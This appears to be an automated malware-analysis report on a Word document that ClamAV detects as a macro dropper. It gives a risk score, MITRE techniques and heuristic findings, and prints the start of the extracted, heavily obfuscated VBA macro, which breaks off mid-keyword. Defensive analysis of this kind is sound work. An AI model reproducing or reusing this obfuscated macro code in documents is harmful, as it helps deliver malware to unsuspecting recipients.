MALICIOUS
124
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a large VBA macro, flagged by heuristics for macro detection and GetObject calls. ClamAV identifies it as 'Doc.Dropper.Agent-7381103-0'. The VBA script appears to be heavily obfuscated but likely decodes and executes a second-stage payload, as suggested by the 'long encoded blob' heuristic and the presence of the 'macros.bas' file. The primary attack pattern is likely malicious macro execution, with an initial access vector of spearphishing attachment.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-7381103-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7381103-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 333287 bytes |
SHA-256: 96c9b018aae6b878bb9ebfcb7a317ad8e90c7abe7065877a6421e9cfbab0572d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 204 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "lCdPsJndDlWfjf, 0, 0, INKEDLib, InkEdit"
Private Sub eNXGvIYOlXtCmJllrV(qCiBoNYgZmKH As String)
On Error Resume Next
Dim AtmwEjLC As String, qQqGupPlFbyDwoPEjLcjSASb As Integer, dfQsVbIfaexbK As String
Dim DuXztaUNAC As Integer
Dim KNCmSLPyWmaDGRSvXFhWIj As String
AtmwEjLC = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
dfQsVbIfaexbK = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
DuXztaUNAC = 0
For qQqGupPlFbyDwoPEjLcjSASb = 32 To 1 Step -1
DuXztaUNAC = 2 * DuXztaUNAC + Sgn(InStr(1, dfQsVbIfaexbK, Mid(InID, qQqGupPlFbyDwoPEjLcjSASb, 1), vbBinaryCompare))
If qQqGupPlFbyDwoPEjLcjSASb Mod 5 = 1 Then
KNCmSLPyWmaDGRSvXFhWIj = Mid(AtmwEjLC, DuXztaUNAC + 1, 1) + KNCmSLPyWmaDGRSvXFhWIj
DuXztaUNAC = 0
End If
Next qQqGupPlFbyDwoPEjLcjSASb
Dim pKgrvLeoaXzamQArz As String
pKgrvLeoaXzamQArz = "686d5947564b6a7" & "277756e454c474f" & "4c76476c7375455" & "84d754a6c4d6f58" & "64675446"
Dim GUARi As Boolean
GUARi = IsNull(pKgrvLeoaXzamQArz)
Dim MMHazwu As Boolean
MMHazwu = IsNull(GUARi)
Dim OzCniAEkgAy As Boolean
OzCniAEkgAy = True
Dim WrIafhihJwHjLjIhMLEIN As Long
WrIafhihJwHjLjIhMLEIN = 109740397
Dim PRVufOuJ As Integer
PRVufOuJ = 25016
Dim yNZBpgAt As Long
yNZBpgAt = 278474792
On Error Resume Next
Dim YoDTBZ As String, TpOckwDeP As Integer, PGobKivDHTFvIe As String
Dim uWAVq As Integer
Dim UXaYWsiWTwfLXivYjQoZps As String
YoDTBZ = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
PGobKivDHTFvIe = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
uWAVq = 0
For TpOckwDeP = 27 To 1 Step -1
uWAVq = 2 * uWAVq + Sgn(InStr(1, PGobKivDHTFvIe, Mid(InID, TpOckwDeP, 1), vbBinaryCompare))
If TpOckwDeP Mod 3 = 1 Then
UXaYWsiWTwfLXivYjQoZps = Mid(YoDTBZ, uWAVq + 1, 1) + UXaYWsiWTwfLXivYjQoZps
uWAVq = 0
End If
Next TpOckwDeP
Call YGkgaNyePLS
Dim ZgxHbXroSVrIMgXkumX As Boolean
ZgxHbXroSVrIMgXkumX = False
Dim JbCPkIfS As Long
JbCPkIfS = 956309142
Dim EDfSWMXgi As Long
EDfSWMXgi = 504845499
Dim PaosXic As Integer
PaosXic = 18985
Dim gsXPdudopzDsQBKDwnMyobyvr As Integer
gsXPdudopzDsQBKDwnMyobyvr = 5065
Dim LZLTKoBAkMRDwyVWyUKagJSxJ As Long
LZLTKoBAkMRDwyVWyUKagJSxJ = 361107141
End Sub
Private Function XGzxdDXPwNs(pujpaemLjmhBNBNKJ As String)
On Error Resume Next
Dim oRCFeVNZqUGwXp As String, DMdpamfQd As Integer, xffOSMFVzTEtmHlMtmNjvjOXz As String
Dim lqUBTBsCsGyXbvkERRLgm As Integer
Dim eJsnaUSkHGjfN As String
oRCFeVNZqUGwXp = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
xffOSMFVzTEtmHlMtmNjvjOXz = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lqUBTBsCsGyXbvkERRLgm = 0
For DMdpamfQd = 71 To 1 Step -1
lqUBTBsCsGyXbvkERRLgm = 2 * lqUBTBsCsGyXbvkERRLgm + Sgn(InStr(1, xffOSMFVzTEtmHlMtmNjvjOXz, Mid(InID, DMdpamfQd, 1), vbBinaryCompare))
If DMdpamfQd Mod 1 = 1 Then
eJsnaUSkHGjfN = Mid(oRCFeVNZqUGwXp, lqUBTBsCsGyXbvkERRLgm + 1, 1) + eJsnaUSkHGjfN
lqUBTBsCsGyXbvkERRLgm = 0
End If
Next DMdpamfQd
Dim GHRriQtuUjcFSkBvMhCpN As Long
GHRriQtuUjcFSkBvMhCpN = 999391069
Dim rSeoVXHYVpglvzQopWr As String
rSeoVXHYVpglvzQopWr = "715a65765" & "847755a70" & "6e5951547" & "344427967" & "4672767a"
Dim dgbNaZFnQOghXdypUMWzOmz As Integer
dgbNaZFnQOghXdypUMWzOmz = 212
Dim oRKCVVLZLb As String
oRKCVVLZLb = "704470716c6a70536a65696456697" & "3"
Dim rWckPjsenY As Integer
rWckPjsenY = 25086
Dim RHgLlI As Boolean
RHgLlI = True
Dim uFDdilqRJK As Integer
uFDdilqRJK = 4534
For WifXzytxx = 39 To 190
Debug.Print WifXzytxx
Next WifXzytxx
eNXGvIYOlXtCmJllrV ("EtEgEDOHXN")
Dim oPpcPZ As String
oPpcPZ = "6f4264577161766c6f42" & "747376446c77586c624e" & "556651"
Dim knGicwAQiQiHrcf As String
knGicwAQiQiHrcf = "6e4b4e69716f53434553584c5374556854694e6b48666d487a4a6b514c59494a4" & "4"
Dim MJniFmjulOkYJAdIaPOdOg As Long
MJniFmjulOkYJAdIaPOdOg = 691968030
Dim XUXCYIogKAHMC As Boolean
XUXCYIogKAHMC = True
Dim IFxvGFOrcOgFVuZPFG As Boolean
IFxvGFOrcOgFVuZPFG = True
End Function
Privat
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.